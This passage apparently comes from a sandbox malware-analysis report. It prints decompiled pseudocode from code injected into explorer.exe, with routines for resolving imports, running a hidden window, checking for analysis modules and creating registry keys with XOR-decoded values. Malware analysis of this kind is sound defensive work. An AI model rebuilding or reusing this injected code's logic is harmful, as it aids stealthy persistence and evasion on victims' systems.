                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                          						_v36 = _t121;
                                          						if(_v36 != 0) {
                                          							if( *_v8 == 0) {
                                          								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                          							} else {
                                          								_v12 =  *_v8 + _a4;
                                          							}
                                          							_v28 = _v28 & 0x00000000;
                                          							while( *_v12 != 0) {
                                          								_v24 = _v24 & 0x00000000;
                                          								_v16 = _v16 & 0x00000000;
                                          								_v64 = _v64 & 0x00000000;
                                          								_v20 = _v20 & 0x00000000;
                                          								if(( *_v12 & _v56) == 0) {
                                          									_v60 =  *_v12 + _a4;
                                          									_v20 = _v60 + 2;
                                          									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                          									_v16 = _v40(_v36, _v20);
                                          								} else {
                                          									_v24 =  *_v12;
                                          									_v20 = _v24 & 0x0000ffff;
                                          									_v16 = _v40(_v36, _v20);
                                          								}
                                          								if(_v24 != _v16) {
                                          									_v44 = _v44 + 1;
                                          									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                          										 *_v12 = _v16;
                                          									} else {
                                          										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                          									}
                                          								}
                                          								_v12 =  &(_v12[1]);
                                          								_v28 = _v28 + 4;
                                          							}
                                          							_v8 = _v8 + 0x14;
                                          							continue;
                                          						}
                                          						_t163 = 0xfffffffd;
                                          						return _t163;
                                          					}
                                          					goto L24;
                                          				}
                                          				return __eax | 0xffffffff;
                                          			}
























                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                                          • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID: GetProcAddress$kernel32.dll
                                          • API String ID: 4133054770-1584408056
                                          • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                                          • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                                          • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                                          • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 200 82eda-82f50 memset call 8902d 205 82fcd-82fd4 200->205 206 82f52-82f81 CreateWindowExA 200->206 207 82fdf-82ff4 205->207 208 82fd6-82fd7 205->208 206->207 209 82f83-82f92 ShowWindow 206->209 208->207 210 82f9b 209->210 212 82fba-82fcb 210->212 212->205 214 82f9d-82fa0 212->214 214->205 215 82fa2-82fb2 214->215 215->212
                                          C-Code - Quality: 96%
                                          			E00082EDA(void* __eflags) {
                                          				CHAR* _v12;
                                          				struct HINSTANCE__* _v32;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				void _v52;
                                          				char _v80;
                                          				char _v144;
                                          				intOrPtr _t25;
                                          				intOrPtr _t32;
                                          				struct HWND__* _t34;
                                          				intOrPtr _t36;
                                          				intOrPtr _t39;
                                          				struct HWND__* _t44;
                                          				intOrPtr _t47;
                                          				intOrPtr _t50;
                                          				void* _t51;
                                          				intOrPtr _t53;
                                          				intOrPtr _t56;
                                          				intOrPtr _t59;
                                          				struct HINSTANCE__* _t64;
                                          
                                          				_t25 =  *0x9e684; // 0x34f8f0
                                          				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                          				memset( &_v52, 0, 0x30);
                                          				_t59 =  *0x9e688; // 0xb0000
                                          				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                                          				_v48 = 3;
                                          				_v52 = 0x30;
                                          				_v12 =  &_v144;
                                          				_v44 = E00082E77;
                                          				_push( &_v52);
                                          				_t32 =  *0x9e694; // 0x34fa48
                                          				_v32 = _t64;
                                          				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                                          					L6:
                                          					_t34 =  *0x9e718; // 0x602c4
                                          					if(_t34 != 0) {
                                          						_t39 =  *0x9e694; // 0x34fa48
                                          						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                          					}
                                          					L8:
                                          					_t36 =  *0x9e694; // 0x34fa48
                                          					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                                          					return 0;
                                          				}
                                          				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                                          				 *0x9e718 = _t44;
                                          				if(_t44 == 0) {
                                          					goto L8;
                                          				}
                                          				ShowWindow(_t44, 0);
                                          				_t47 =  *0x9e694; // 0x34fa48
                                          				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
                                          				while(1) {
                                          					_t50 =  *0x9e694; // 0x34fa48
                                          					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                          					if(_t51 == 0) {
                                          						goto L6;
                                          					}
                                          					if(_t51 == 0xffffffff) {
                                          						goto L6;
                                          					}
                                          					_t53 =  *0x9e694; // 0x34fa48
                                          					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                          					_t56 =  *0x9e694; // 0x34fa48
                                          					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                          				}
                                          				goto L6;
                                          			}
























                                          APIs
                                          • memset.MSVCRT ref: 00082EF9
                                          • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                                          • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CreateShowmemset
                                          • String ID: 0
                                          • API String ID: 3027179219-4108050209
                                          • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                                          • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                                          • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                                          • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 217 84d6d-84d8f 218 84dee-84e1b call 8b7a8 call 8a86d call 8a471 217->218 219 84d91-84db3 call 895c7 * 2 217->219 232 84e1d-84e20 218->232 233 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 218->233 219->218 229 84db5-84db7 219->229 229->218 231 84db9-84dc4 GetModuleHandleA 229->231 234 84dcd 231->234 235 84dc6-84dcb GetModuleHandleA 231->235 236 852b9-852bf 232->236 252 84ea1-84ed9 call 8861a call 84a0b 233->252 253 84e82-84e93 call 8896f 233->253 238 84dd5-84dec call 885c2 * 2 234->238 235->234 235->238 238->218 238->232 263 84ef8-84f1b 252->263 264 84edb-84ee3 252->264 258 84e9c-84e9f 253->258 259 84e95-84e97 call 8a2e3 253->259 258->252 259->258 266 84f1d-84f2b 263->266 267 84f2f-84f54 call 8e2c6 263->267 264->263 265 84ee5-84ee9 264->265 269 84eef-84ef2 265->269 270 851f3-85220 call 895e1 call 892e5 265->270 266->267 276 84f71-84f78 267->276 277 84f56-84f6a call 8e2c6 267->277 269->263 269->270 280 85222-8522b call 8b269 270->280 281 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 270->281 276->270 282 84f7e-84f87 276->282 277->276 293 85239-85246 call 8861a 280->293 294 8522d-85232 280->294 313 852b7 281->313 285 84f89-84f8e 282->285 286 84f96-84fa3 282->286 285->286 289 84f90 285->289 286->270 290 84fa9-84fad 286->290 289->286 295 85082-85088 290->295 296 84fb3-84fb6 290->296 293->281 294->293 295->270 299 8508e-850ff call 849a5 call 8fc1f 295->299 296->270 297 84fbc-8500f call 849a5 call 88604 296->297 297->313 317 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 297->317 299->270 318 85105-85119 call 88604 299->318 313->236 317->313 318->270 324 8511f-85171 call 8109a call 8902d call 860df 318->324 338 85173-851d1 call 89640 call 885d5 call 8a911 324->338 339 851e5-851ec call 8861a 324->339 347 851d6-851e2 call 8861a 338->347 343 851f1-851f2 339->343 343->270 347->339
                                          C-Code - Quality: 70%
                                          			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                          				char _v516;
                                          				char _v556;
                                          				char _v564;
                                          				char _v568;
                                          				char _v572;
                                          				char _v576;
                                          				intOrPtr _v580;
                                          				char _v588;
                                          				signed int _v596;
                                          				intOrPtr _v602;
                                          				intOrPtr _v604;
                                          				char _v608;
                                          				CHAR* _v612;
                                          				CHAR* _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				char _v636;
                                          				intOrPtr _t119;
                                          				void* _t120;
                                          				signed int _t122;
                                          				intOrPtr _t123;
                                          				CHAR* _t124;
                                          				intOrPtr _t125;
                                          				CHAR* _t127;
                                          				WCHAR* _t130;
                                          				intOrPtr _t133;
                                          				intOrPtr _t137;
                                          				WCHAR* _t138;
                                          				intOrPtr _t142;
                                          				WCHAR* _t143;
                                          				CHAR* _t144;
                                          				intOrPtr _t145;
                                          				intOrPtr _t150;
                                          				intOrPtr _t153;
                                          				WCHAR* _t154;
                                          				signed int _t159;
                                          				WCHAR* _t160;
                                          				intOrPtr _t163;
                                          				intOrPtr _t165;
                                          				intOrPtr _t166;
                                          				intOrPtr _t170;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				intOrPtr _t182;
                                          				WCHAR* _t184;
                                          				char _t186;
                                          				WCHAR* _t188;
                                          				intOrPtr _t200;
                                          				intOrPtr _t211;
                                          				signed int _t215;
                                          				char _t220;
                                          				WCHAR* _t231;
                                          				intOrPtr _t235;
                                          				intOrPtr _t238;
                                          				intOrPtr _t239;
                                          				intOrPtr _t246;
                                          				signed int _t248;
                                          				WCHAR* _t249;
                                          				CHAR* _t250;
                                          				intOrPtr _t262;
                                          				void* _t271;
                                          				intOrPtr _t272;
                                          				signed int _t277;
                                          				void* _t278;
                                          				intOrPtr _t280;
                                          				signed int _t282;
                                          				void* _t298;
                                          				void* _t299;
                                          				intOrPtr _t305;
                                          				CHAR* _t326;
                                          				void* _t328;
                                          				WCHAR* _t329;
                                          				intOrPtr _t331;
                                          				WCHAR* _t333;
                                          				signed int _t335;
                                          				intOrPtr* _t337;
                                          				void* _t338;
                                          				void* _t339;
                                          				void* _t353;
                                          
                                          				_t353 = __fp0;
                                          				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                          				_t119 =  *0x9e688; // 0xb0000
                                          				_v620 = _v620 & 0x00000000;
                                          				_t328 = __ecx;
                                          				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                          					L7:
                                          					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
                                          					_t14 = _t120 + 1; // 0x1
                                          					E0008A86D( &_v556, _t14, _t351);
                                          					_t298 = 0x64;
                                          					_t122 = E0008A471( &_v556, _t298);
                                          					 *0x9e748 = _t122;
                                          					if(_t122 != 0) {
                                          						_push(0x4e5);
                                          						_t299 = 0x10;
                                          						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
                                          						 *0x9e680 = _t123;
                                          						 *_t337 = 0x610;
                                          						_t124 = E000895E1(0x9b9cc);
                                          						_push(0);
                                          						_push(_t124);
                                          						_v612 = _t124;
                                          						_t125 =  *0x9e688; // 0xb0000
                                          						_t127 = E000892E5(_t125 + 0x228);
                                          						_t338 = _t337 + 0xc;
                                          						_v616 = _t127;
                                          						E000885D5( &_v612);
                                          						_t130 = E0008B269(_t127);
                                          						_t246 = 3;
                                          						__eflags = _t130;
                                          						if(_t130 != 0) {
                                          							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                          							 *_t328 = _t246;
                                          						}
                                          						E0008861A( &_v616, 0xfffffffe);
                                          						_t133 =  *0x9e688; // 0xb0000
                                          						_t22 = _t133 + 0x114; // 0xb0114
                                          						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                          						_t262 =  *0x9e688; // 0xb0000
                                          						_t339 = _t338 + 0x14;
                                          						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                          						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                          							L17:
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							_v572 = _t328;
                                          							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                          							_t137 =  *0x9e680; // 0x34fdb0
                                          							_t138 =  *(_t137 + 8);
                                          							__eflags = _t138;
                                          							if(_t138 != 0) {
                                          								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                                          							}
                                          							_v620 = _v620 & 0x00000000;
                                          							E0008E2C6(_t353,  &_v576); // executed
                                          							_pop(_t262);
                                          							_t142 =  *0x9e6b4; // 0x34fa98
                                          							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                          							__eflags = _t143;
                                          							if(_t143 == 0) {
                                          								E0008E2C6(_t353,  &_v588);
                                          								_t235 =  *0x9e6b4; // 0x34fa98
                                          								_pop(_t262);
                                          								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                          							}
                                          							__eflags =  *0x9e73c;
                                          							if( *0x9e73c <= 0) {
                                          								goto L36;
                                          							} else {
                                          								_t165 =  *0x9e680; // 0x34fdb0
                                          								__eflags =  *(_t165 + 8);
                                          								if( *(_t165 + 8) != 0) {
                                          									_t231 =  *(_t165 + 0xc);
                                          									__eflags = _t231;
                                          									if(_t231 != 0) {
                                          										 *_t231(_v580);
                                          									}
                                          								}
                                          								_t166 =  *0x9e688; // 0xb0000
                                          								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                          								__eflags = _t262 - _t246;
                                          								if(_t262 == _t246) {
                                          									goto L36;
                                          								} else {
                                          									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                          									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                          										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                          										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                          											E000849A5();
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											_t170 =  *0x9e684; // 0x34f8f0
                                          											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                          											_t262 = _v602;
                                          											_t248 = 0x3c;
                                          											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                          											_v596 = _t173;
                                          											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                          											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                          											_v624 = _t178;
                                          											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                          											_t182 =  *0x9e688; // 0xb0000
                                          											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
                                          											_t339 = _t339 + 0xc;
                                          											__eflags = _t184;
                                          											if(_t184 >= 0) {
                                          												_t333 = E00088604(0x1000);
                                          												_v616 = _t333;
                                          												_pop(_t262);
                                          												__eflags = _t333;
                                          												if(_t333 != 0) {
                                          													_t186 = E0008109A(_t262, 0x148);
                                          													_t305 =  *0x9e688; // 0xb0000
                                          													_v636 = _t186;
                                          													_push(_t305 + 0x648);
                                          													_push(0xa);
                                          													_push(7);
                                          													_t271 = 2;
                                          													E0008902D(_t271,  &_v572);
                                          													_t272 =  *0x9e688; // 0xb0000
                                          													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                          													_t339 = _t339 + 0x18;
                                          													_v632 = _t188;
                                          													__eflags = _t188;
                                          													if(_t188 != 0) {
                                          														_push(_v624 % _t248 & 0x0000ffff);
                                          														_push(_v628 & 0x0000ffff);
                                          														_push(_v596 % _t248 & 0x0000ffff);
                                          														_push(_v620 & 0x0000ffff);
                                          														_push(_v632);
                                          														_push( &_v572);
                                          														_t200 =  *0x9e688; // 0xb0000
                                          														__eflags = _t200 + 0x1020;
                                          														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                          														E000885D5( &_v636);
                                          														E0008A911(_t333, 0, 0xbb8, 1); // executed
                                          														E0008861A( &_v632, 0xfffffffe);
                                          														_t339 = _t339 + 0x44;
                                          													}
                                          													E0008861A( &_v616, 0xfffffffe); // executed
                                          													_pop(_t262);
                                          												}
                                          											}
                                          										}
                                          										goto L36;
                                          									}
                                          									__eflags = _t262 - 2;
                                          									if(_t262 != 2) {
                                          										goto L36;
                                          									}
                                          									E000849A5();
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									_t211 =  *0x9e684; // 0x34f8f0
                                          									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                          									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                          									_v628 = _t215;
                                          									_t277 = 0x3c;
                                          									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                          									_t249 = E00088604(0x1000);
                                          									_v624 = _t249;
                                          									_pop(_t278);
                                          									__eflags = _t249;
                                          									if(_t249 != 0) {
                                          										_t220 = E000895E1(_t278, 0x32d);
                                          										_t280 =  *0x9e688; // 0xb0000
                                          										_push(_t280 + 0x228);
                                          										_t282 = 0x3c;
                                          										_v636 = _t220;
                                          										_push(_v628 % _t282 & 0x0000ffff);
                                          										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                          										E000885D5( &_v636);
                                          										E0008A911(_t249, 0, 0xbb8, 1);
                                          										E0008861A( &_v624, 0xfffffffe);
                                          									}
                                          									goto L41;
                                          								}
                                          							}
                                          						} else {
                                          							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                          							__eflags = _t238 - _t246;
                                          							if(_t238 == _t246) {
                                          								goto L17;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                          							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                          								L36:
                                          								_t144 = E000895E1(_t262, 0x610);
                                          								_push(0);
                                          								_push(_t144);
                                          								_v616 = _t144;
                                          								_t145 =  *0x9e688; // 0xb0000
                                          								_t329 = E000892E5(_t145 + 0x228);
                                          								_v612 = _t329;
                                          								__eflags = _t329;
                                          								if(_t329 != 0) {
                                          									_t160 = E0008B269(_t329);
                                          									__eflags = _t160;
                                          									if(_t160 != 0) {
                                          										_t163 =  *0x9e684; // 0x34f8f0
                                          										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                          									}
                                          									E0008861A( &_v612, 0xfffffffe);
                                          								}
                                          								E000885D5( &_v616);
                                          								_t150 =  *0x9e688; // 0xb0000
                                          								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                                          								_t153 =  *0x9e688; // 0xb0000
                                          								_t154 = _t153 + 0x228;
                                          								__eflags = _t154;
                                          								lstrcpynW(_t154,  *0x9e738, 0x105);
                                          								_t331 =  *0x9e688; // 0xb0000
                                          								_t117 = _t331 + 0x228; // 0xb0228
                                          								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                                          								E0008861A(0x9e740, 0xfffffffe);
                                          								E0008861A(0x9e738, 0xfffffffe);
                                          								L41:
                                          								_t159 = 0;
                                          								__eflags = 0;
                                          								L42:
                                          								return _t159;
                                          							}
                                          							__eflags = _t238 - 2;
                                          							if(_t238 != 2) {
                                          								goto L36;
                                          							}
                                          							goto L17;
                                          						}
                                          					}
                                          					L8:
                                          					_t159 = _t122 | 0xffffffff;
                                          					goto L42;
                                          				}
                                          				_t250 = E000895C7(0x6e2);
                                          				_v616 = _t250;
                                          				_t326 = E000895C7(0x9f5);
                                          				_v612 = _t326;
                                          				if(_t250 != 0 && _t326 != 0) {
                                          					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                          						_v620 = 1;
                                          					}
                                          					E000885C2( &_v616);
                                          					_t122 = E000885C2( &_v612);
                                          					_t351 = _v620;
                                          					if(_v620 != 0) {
                                          						goto L8;
                                          					}
                                          				}
                                          			}


                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                                          • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                                          • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModulelstrcpyn
                                          • String ID:
                                          • API String ID: 3430401031-0
                                          • Opcode ID: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
                                          • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                                          • Opcode Fuzzy Hash: 4a50328df8d3e64cefb64bf281c7b55ad0a95e4f9f5383233e43d29d8882ca49
                                          • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				int _v24;
                                          				void* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				int* _v40;
                                          				int** _v44;
                                          				void _v108;
                                          				int* _t90;
                                          				void* _t91;
                                          				char* _t92;
                                          				long _t96;
                                          				int* _t97;
                                          				int* _t101;
                                          				long _t111;
                                          				int* _t112;
                                          				intOrPtr _t122;
                                          				char* _t125;
                                          				intOrPtr _t126;
                                          				intOrPtr _t128;
                                          				int* _t129;
                                          				intOrPtr _t131;
                                          				int* _t133;
                                          				intOrPtr _t134;
                                          				int* _t135;
                                          				intOrPtr _t136;
                                          				char* _t139;
                                          				int _t143;
                                          				int _t147;
                                          				intOrPtr _t148;
                                          				int* _t149;
                                          				int* _t154;
                                          				int** _t155;
                                          				int* _t161;
                                          				int* _t163;
                                          				intOrPtr _t164;
                                          				intOrPtr _t171;
                                          				int _t176;
                                          				char* _t177;
                                          				char* _t178;
                                          				char _t179;
                                          				void* _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          
                                          				_t176 = 0;
                                          				_v24 = __edx;
                                          				_t177 = 0;
                                          				_v32 = __ecx;
                                          				_v28 = 0;
                                          				_v8 = 0x80000001;
                                          				_v20 = 0;
                                          				_t155 = E00088604(0x110);
                                          				_v44 = _t155;
                                          				if(_t155 != 0) {
                                          					_t158 = _a4;
                                          					_t155[0x42] = _a4;
                                          					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                                          					_t161 = _v108;
                                          					__eflags = _t161 - 0x61 - 0x19;
                                          					_t90 = _t161;
                                          					if(_t161 - 0x61 <= 0x19) {
                                          						_t90 = _t90 - 0x20;
                                          						__eflags = _t90;
                                          					}
                                          					_v108 = _t90;
                                          					_t91 = E000895C7(0x4d2);
                                          					_t163 = _v24;
                                          					_v16 = _t91;
                                          					__eflags = _t163;
                                          					if(_t163 == 0) {
                                          						L16:
                                          						_t164 =  *0x9e688; // 0xb0000
                                          						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                                          							_push(_t176);
                                          							_push( &_v108);
                                          							_push("\\");
                                          							_t92 = E00089292(_t91);
                                          							_t181 = _t181 + 0x10;
                                          							L20:
                                          							_t177 = _t92;
                                          							_v20 = _t177;
                                          							goto L21;
                                          						}
                                          						_v24 = _t176;
                                          						_v8 = 0x80000003;
                                          						_t122 =  *0x9e68c; // 0x34fab8
                                          						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                                          						__eflags = _v24 - _t177;
                                          						if(_v24 == _t177) {
                                          							goto L21;
                                          						}
                                          						_push(_t176);
                                          						_push( &_v108);
                                          						_t125 = "\\";
                                          						_push(_t125);
                                          						_push(_v16);
                                          						_push(_t125);
                                          						_t92 = E00089292(_v24);
                                          						_t181 = _t181 + 0x18;
                                          						goto L20;
                                          					} else {
                                          						_t126 =  *0x9e688; // 0xb0000
                                          						_t128 =  *0x9e68c; // 0x34fab8
                                          						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                                          						__eflags = _t129;
                                          						if(_t129 != 0) {
                                          							_t91 = _v16;
                                          							goto L16;
                                          						}
                                          						_v12 = _t176;
                                          						_t131 =  *0x9e68c; // 0x34fab8
                                          						_v8 = 0x80000003;
                                          						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                                          						__eflags = _v12 - _t177;
                                          						if(_v12 == _t177) {
                                          							L21:
                                          							E000885C2( &_v16);
                                          							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                                          							__eflags = _t96;
                                          							if(_t96 == 0) {
                                          								_t97 = _a8;
                                          								__eflags = _t97;
                                          								if(_t97 != 0) {
                                          									 *_t97 = 1;
                                          								}
                                          								_push(_v28);
                                          								L30:
                                          								RegCloseKey();
                                          								_t155[0x43] = _v8;
                                          								_t101 = E0008C379(_t177);
                                          								 *_t155 = _t101;
                                          								__eflags = _t101;
                                          								if(_t101 == 0) {
                                          									L32:
                                          									E0008861A( &_v20, 0xffffffff);
                                          									return _t155;
                                          								} else {
                                          									goto L31;
                                          								}
                                          								do {
                                          									L31:
                                          									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                                          									_t176 = _t176 + 1;
                                          									__eflags = _t176 -  *_t155;
                                          								} while (_t176 <  *_t155);
                                          								goto L32;
                                          							}
                                          							_v16 = _t176;
                                          							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                                          							__eflags = _t111;
                                          							if(_t111 == 0) {
                                          								_t112 = _a8;
                                          								__eflags = _t112;
                                          								if(_t112 != 0) {
                                          									 *_t112 = _t176;
                                          								}
                                          								_push(_v16);
                                          								goto L30;
                                          							}
                                          							L23:
                                          							E0008861A( &_v44, 0x110);
                                          							memset( &_v108, _t176, 0x40);
                                          							E0008861A( &_v20, 0xffffffff);
                                          							goto L1;
                                          						}
                                          						_push(_t176);
                                          						_push(_v16);
                                          						_t178 = "\\";
                                          						_push(_t178);
                                          						_t133 = E00089292(_v12);
                                          						_t181 = _t181 + 0x10;
                                          						_v40 = _t133;
                                          						__eflags = _t133;
                                          						if(_t133 == 0) {
                                          							goto L23;
                                          						}
                                          						_t134 =  *0x9e68c; // 0x34fab8
                                          						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                                          						__eflags = _t135;
                                          						if(_t135 == 0) {
                                          							_t136 =  *0x9e68c; // 0x34fab8
                                          							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                                          						} else {
                                          							_t143 = E000895E1( &_v36, 0x34);
                                          							_v24 = _t143;
                                          							_t179 = E000892E5(_v32);
                                          							_v32 = _t179;
                                          							E000885D5( &_v24);
                                          							_t183 = _t181 + 0x18;
                                          							_t147 = E00089256(_v12);
                                          							_v24 = _t147;
                                          							_t148 =  *0x9e68c; // 0x34fab8
                                          							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                                          							__eflags = _t149;
                                          							if(_t149 == 0) {
                                          								_t154 = _a12;
                                          								__eflags = _t154;
                                          								if(_t154 != 0) {
                                          									 *_t154 = 1;
                                          								}
                                          							}
                                          							E0008861A( &_v32, 0xfffffffe);
                                          							E0008861A( &_v24, 0xfffffffe);
                                          							_t181 = _t183 + 0x10;
                                          							_t178 = "\\";
                                          						}
                                          						_t139 = E00089292(_v12);
                                          						_t171 =  *0x9e684; // 0x34f8f0
                                          						_t181 = _t181 + 0x18;
                                          						_t177 = _t139;
                                          						_v20 = _t177;
                                          						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                                          						E0008861A( &_v40, 0xffffffff);
                                          						goto L21;
                                          					}
                                          				}
                                          				L1:
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
